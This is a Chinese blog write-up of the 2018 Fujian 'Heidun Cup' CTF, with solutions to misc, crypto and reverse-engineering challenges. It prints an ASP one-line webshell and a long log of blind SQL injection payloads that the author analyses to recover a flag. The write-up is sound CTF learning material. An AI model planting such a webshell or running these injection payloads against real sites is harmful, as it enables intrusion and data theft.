【2018福建省“黑盾杯”】部分解题思路

最新推荐文章于 2023-09-14 17:15:50 发布
最新推荐文章于 2023-09-14 17:15:50 发布
阅读量3.7k 收藏 6
点赞数
分类专栏: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sweet0swat/article/details/82730825
版权

由于我没有参加比赛,所以WEB部分没有办法解题

MISC

题目:CCGS

打开网页

 

 使用binwalk进行分析

发现图片文件还藏着zip文件,提取出来,但是文件中的文字很多,用notepad++都卡,目测是Base64编码,所以写脚本解密之后保存文件:

import base64

fp = open("secret.txt","r")
fp1 = open("secret.png","wb")
secret = fp.read()
#print secret
s1 = base64.b64decode(secret)
s1 = base64.b64decode(s1)
fp1.write(s1)
print
print "[+] Png write success"
fp1.close()
fp.close()

嗯,小姐姐还是挺好看的

 

题目:spartacus

这题是原题  

 

 

<%execute request("images")%>,这个是一句话木马,然后用SHA1加密一下提交即可

好无趣

题目:TheSameInside

打开wireshark,追踪TCP流,看到里面有个数据包是在上传压缩文件的,所以把上传的数据导出来:

打开content.xml文件,看到里面实际上还有另一个压缩文件:

把 这些数据导出来,看到是一个pyc脚本:

逆向PYC之后看到如下源码:

# File: F (Python 2.7)

from sys import exit

def gold_room():
    print 'This room is full of gold. How much do you take?'
    next = raw_input('> ')
    if '0' in next or '1' in next:
        how_much = int(next)
    else:
        dead('Man, learn to type a number.')
    if how_much < 50:
        print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'
        exit(0)
    else:
        dead('You greedy bastard!')


def bear_room():
    print 'There is a bear here.'
    print 'The bear has a bunch of honey.'
    print 'The fat bear is in front of another door.'
    print 'How are you going to move the bear?'
    bear_moved = False
    while True:
        next = raw_input('> ')
        if next == 'take honey':
            dead('The bear looks at you then slaps your face off.')
            continue
        if next == 'taunt bear' and not bear_moved:
            print 'The bear has moved from the door. You can go through it now.'
            bear_moved = True
            continue
        if next == 'taunt bear' and bear_moved:
            dead('The bear gets pissed off and chews your leg off.')
            continue
        if next == 'open door' and bear_moved:
            gold_room()
            continue
        print 'I got no idea what that means.'


def cthulhu_room():
    print 'Here you see the great evil Cthulhu.'
    print 'He, it, whatever stares at you and you go insane.'
    print 'Do you flee for your life or eat your head?'
    next = raw_input('> ')
    if 'flee' in next:
        start()
    elif 'head' in next:
        dead('Well that was tasty!')
    else:
        cthulhu_room()


def dead(why):
    print why, 'Good job!'
    exit(0)


def start():
    print 'You are in a dark room.'
    print 'There is a door to your right and left.'
    print 'Which one do you take?'
    next = raw_input('> ')
    if next == 'left':
        bear_room()
    elif next == 'right':
        cthulhu_room()
    else:
        dead('You stumble around the room until you starve.')

start()

找到里面的“ print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'”,用base64解密后一半的字符串,发现是一个暗示

 到这步卡了很久,跟其他几个大佬讨论了一下,说是用十六进制编辑器打开,查找关键字argv,然后后面那串字符带入即可:

后面出题人自己出来说是单表置换,所以解出来得可能是

我暂时认为flag就是 flag is How dogs is

所以出题人是恋爱了?然后再嘲讽一波单身狗?

题目:注入日志分析

用notepad++打开,发现是访问的日志

这里内容比较多,而且无效的信息也比较多,所以用py写了一个脚本,只筛选处访问的参数以及是否报错,同时也进行url解码

# coding: utf8

import urllib

fp = open("data.log","r")
fp1 = open("data_se.log","w")
for i in fp.readlines():
    # 跳过注释
    if i[0] == "#":
        continue
    # 截取访问的资源和访问的参数
    reqs = i.split(" ")
    decode_s = urllib.unquote(reqs[6])
    print "[*]",decode_s
    fp1.write(decode_s+"\n")
print "[+] write ok"



fp1.close()
fp.close()

因为这里需要知道攻击者拿了哪些东西,所以只要知道他从最总的目标表中dump出什么东西,所以只要从后面开始找是否存在明显的表名就可以了。

很明显的是,攻击者从theflag表中dump出了数据。

重点关注跟theflag有关的日志:

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>53|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>49
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>99|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>100
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>102|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>101
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>49|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>99
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>32|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>16|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>8|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>4|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>2|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>1|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。

 赛选的原则就是如果表达式逻辑正确,就不会显示中文报错提示

最后得到:53,99,54,102,49,100,54

解码得到:5c6f1d6

Crypto

题目:这是啥呀?

MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2===

很明显的Base32编码特征:全大写字母+数字+等号

直接base32解码得到flag:flag{c8b558b954019856f0b02345dc39558c}

题目:brightstar

snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees

key: howarey

Columnar Transposition Cipher

嗯,我就喜欢简单粗暴的,直接说这是列位移密码,具体的规则如下:

所以flag:ltisofteninthedarkestskiesthatweseebrighteststarts

RE

题目:reverseMe

用IDA还原伪代码:

__int64 __cdecl main_0()
{
  int v0; // edx
  __int64 v1; // ST00_8
  int v3; // [esp+0h] [ebp-1A0h]
  const char **v4; // [esp+4h] [ebp-19Ch]
  const char **v5; // [esp+8h] [ebp-198h]
  int v6; // [esp+Ch] [ebp-194h]
  int i; // [esp+D4h] [ebp-CCh]
  int v8; // [esp+E0h] [ebp-C0h]
  int v9; // [esp+ECh] [ebp-B4h]
  int v10; // [esp+F0h] [ebp-B0h]
  int v11; // [esp+F4h] [ebp-ACh]
  int v12; // [esp+F8h] [ebp-A8h]
  int v13; // [esp+FCh] [ebp-A4h]
  int v14; // [esp+100h] [ebp-A0h]
  int v15; // [esp+104h] [ebp-9Ch]
  int v16; // [esp+108h] [ebp-98h]
  int v17; // [esp+10Ch] [ebp-94h]
  int v18; // [esp+110h] [ebp-90h]
  int v19; // [esp+114h] [ebp-8Ch]
  int v20; // [esp+118h] [ebp-88h]
  int v21; // [esp+11Ch] [ebp-84h]
  int v22; // [esp+120h] [ebp-80h]
  int v23; // [esp+124h] [ebp-7Ch]
  int v24; // [esp+128h] [ebp-78h]
  int v25; // [esp+12Ch] [ebp-74h]
  int v26; // [esp+130h] [ebp-70h]
  int v27; // [esp+134h] [ebp-6Ch]
  int v28; // [esp+138h] [ebp-68h]
  int v29; // [esp+13Ch] [ebp-64h]
  int v30; // [esp+140h] [ebp-60h]
  char v31; // [esp+14Fh] [ebp-51h]
  char v32[17]; // [esp+178h] [ebp-28h]
  char v33; // [esp+189h] [ebp-17h]
  char v34; // [esp+18Ah] [ebp-16h]
  char v35; // [esp+18Bh] [ebp-15h]
  char v36; // [esp+18Ch] [ebp-14h]
  char v37; // [esp+18Dh] [ebp-13h]

  v31 = 0;
  v9 = 1;
  v10 = 4;
  v11 = 14;
  v12 = 10;
  v13 = 5;
  v14 = 36;
  v15 = 23;
  v16 = 42;
  v17 = 13;
  v18 = 19;
  v19 = 28;
  v20 = 13;
  v21 = 27;
  v22 = 39;
  v23 = 48;
  v24 = 41;
  v25 = 42;
  v26 = 26;
  v27 = 20;
  v28 = 59;
  v29 = 4;
  v30 = 0;
  printf("plz enter the flag:");
  while ( 1 )
  {
    v6 = getch();
    v32[v31] = v6;
    if ( !(_BYTE)v6 || v32[v31] == 13 )
      break;
    if ( v32[v31] == 8 )
    {
      printf("\b\b");
      --v31;
    }
    else
    {
      printf("%c", v32[v31++]);
    }
  }
  v8 = 0;
  for ( i = 0; i < 17; ++i )
  {
    if ( v32[i] != byte_415768[*(&v9 + i)] )
      v8 = 1;
  }
  if ( v33 != 49 || v34 != 48 || v35 != 50 || v36 != 52 || v37 != 125 )
    v8 = 1;
  v32[v31] = 0;
  printf("\r\n");
  if ( v8 )
  {
    printf("u r wrong\r\n\r\n");
    main(v3, v4, v5);
  }
  else
  {
    printf("u r right!\r\n");
  }
  system("pause");
  HIDWORD(v1) = v0;
  LODWORD(v1) = 0;
  return v1;
}

 这里看到两个关键的逻辑

1、前面17位必须和byte_415768数组中的相应值相同,而相应值可以在最初变量赋值的时候看到

2、最后5位是“1024}”

 用IDA找到byte_415768

 所以很简单,所以写脚本就能算出来

# coding: utf8

s1 = 'IKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
l = [1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42]
tmp = ''
for i in l:
    tmp += s1[i]
tmp += "1024}"
print tmp

 得到结果

PWN

待更

因为一些事心静不下来,所以改天再更新

Tr@cer
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2023 黑盾CTF --- Crypto wp
3tefanie丶zhou的博客
05-30 858
【水中有明月,碎碎又圆圆。】
2021年福建省黑盾部分WP
Nancy523的博客
12-03 2570
蚌埠住了真的蚌埠住了 熟悉的主办方熟悉的验证码平台 最后五分钟被疯狂反超gank 从决赛圈被打成优秀奖 题是好题 其他的就说不定了 文章目录1、MiscSignin:日志分析:DNS协议分析:Modbus的秘密:Crypto:Decode:Cry1:Web:在线电力控制系统消息传送:Reverse:Master Of VM: 1、Misc Signin: 通过观察附件得到附件为一个文本 全由01组成 根据积累与特征可以看出 是通过PIL库将01转换为像素点来构造二维码 得到输出结果后观察得到二维码缺少
7.24 两道二进制题目练习的总结
duan哥哥的博客
07-27 2195
1.兴趣是最好的老师 首先我们把根据PE文件的格式知道这个文件本身有错误,所以不能在IDA中打开,我们先把它在010Editor.exe中修改一下,我们把PE头改为50 45 00 00,然后就把它拉入IDA中,然后打开,找到有程序的开始进行分析。 __int64 main_0() { int v0; // edx __int64 v1; // ST00_8 int v3; /...
2021黑盾CTF部分WP
qq_45149716的博客
12-05 4944
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
最全CTF Web题思路总结(更新ing)
yjprolus的博客
02-12 3万+
个人向CTF Web题思路总结笔记
福建省2004-2019地质灾害统计表
04-19
由于福建省多山区,是地质灾害多发地,研究福建省地质灾害对当地经济发展,公路交通有着极其重要的作用。由于网上没有用系统性统计福建省近十几年的灾害发生频率等数据,所以小编统计了福建省近十几年地质灾害统计...
中国省级行政区划-福建省shp
04-03
中国省级行政区划-福建省shp
基于BP神经网络的福建省碳排放预测
最新发布
01-09
利用BP神经网络构建了福建省碳排放的预测模型
福建省12.5m分辨率DEM数据.txt
05-17
tfi格式,12.5m 数据源:alos
福建省市县2020区划.zip
02-26
福建省2020年省、市、县行政区shp,矢量数据、wgs84坐标系
CTF_Misc_【BUUCTF】 杂项——二维码Code
十二_的博客
07-27 886
e指定格式字符串,格式字符串由单引号包含,格式字符串形如’a/b“format1”“format2”。每个格式字符串由三部分组成,每个由空格分割,如a/b表示,b表示对每b个输入字节应用format1格式,a表示对每个a输入字节应用format2,一般a>b,且b只能为1,2,4,另外a可以省略,省略a=1。*注意它能够查看任何文件,不限于与二进制文件。文件地址命令尝试**解压缩,**发现存在密码,只可尝试爆破解压。常查看规范的十六进制和ASCII码,是否有隐藏的文件。,先生成hash文件.......
一句话***<%execute request("a")%>的原理
caiguazheng4921的博客
04-19 494
首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码<%execute request("a")%>可以这样来解释:<% if request("a")<>"" then execute request("a") %> 如果a不为空的时候执行.执行什么呢...
